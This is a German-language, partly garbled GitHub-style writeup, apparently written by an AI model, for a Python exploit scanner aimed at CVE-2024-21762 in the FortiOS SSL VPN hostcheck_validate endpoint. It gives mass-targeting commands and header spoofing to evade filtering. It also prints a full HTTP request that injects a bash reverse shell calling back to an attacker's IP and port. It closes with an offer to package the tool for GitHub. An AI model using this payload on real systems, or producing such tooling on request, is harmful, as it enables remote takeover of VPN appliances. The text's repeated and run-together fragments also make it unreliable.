
Proof-of-Concept-Scanner, der auf CVE-2024-21762 im /remote/hostcheck_validate-Endpunkt des FortiOS SSL VPN abzielt, mit Auslieferung einer Reverse-Shell-Nutzlast.
Proof-of-Concept-Scanner, der auf CVE-2024-21762 im /remote/hostcheck_validate-Endpunkt des FortiOS SSL VPN abzielt und Reverse-Shell-Payloads liefert.
Hier ist ein GitHub-ähnlicher Writeup für Ihr Projekt, einschließlich einer sauberen und prägnanten Zusammenfassung, einer Nutzungsanleitung und Kontext dazu, wie es zu der CVE passt.
CVE-2024-21762 FortiOS HostCheck PoC ScannerProof-of-Concept-Scanner, der auf CVE-2024-21762 im
/remote/hostcheck_validate-Endpunkt des FortiOS SSL VPN abzielt und Reverse-Shell-Payloads liefert.
Dieses Python-Skript ist ein PoC (Proof of Concept)-Tool, das entwickelt wurde, um mit der Fortinet FortiOS SSL VPN-Schnittstelle zu interagieren und auf CVE-2024-21762 abzielt — eine stackbasierte Pufferüberlauf- oder Befehlsinjektions-Schwachstelle im /remote/hostcheck_validate-Endpunkt.
Haftungsausschluss: Dies ist nur für Bildungs- und autorisierte Testzwecke bestimmt.
/remote/hostcheck_validate auf einer FortiGate SSL VPN-Schnittstelle.host).User-Agent, Cookie), um die oberflächliche FortiOS-Anfragefilterung zu umgehen.last_response.txt)tqdm zur FortschrittsvisualisierungAbhängigkeiten installieren:
pip install tqdm
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
targets.txt: Liste der Ziele im Format IP:PORT, eine pro Zeileresults.txt: Ausgabeprotokoll der Exploit-VersuchePOST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded
host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...
Das Tool schreibt die vollständige HTTP-Antwort jedes Versuchs in:
last_response.txt
Verwenden Sie dies, um zu überprüfen, ob die Anfrage geparst, abgelehnt oder ein Fehlercode zurückgegeben wurde.
Dieser Code wird nur für Bildungs- und autorisierte Testzwecke bereitgestellt. Verwenden Sie dies nicht in Netzwerken oder Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.
Carter — Cybersicherheitsingenieur, Red/Purple-Team-Enthusiast, PoC-Automatisierungs-Nerd.
Möchten Sie dies in eine README.md-Datei + Repo-Struktur verpackt haben, die bereit ist, auf GitHub gepusht zu werden? Ich kann das als Nächstes generieren.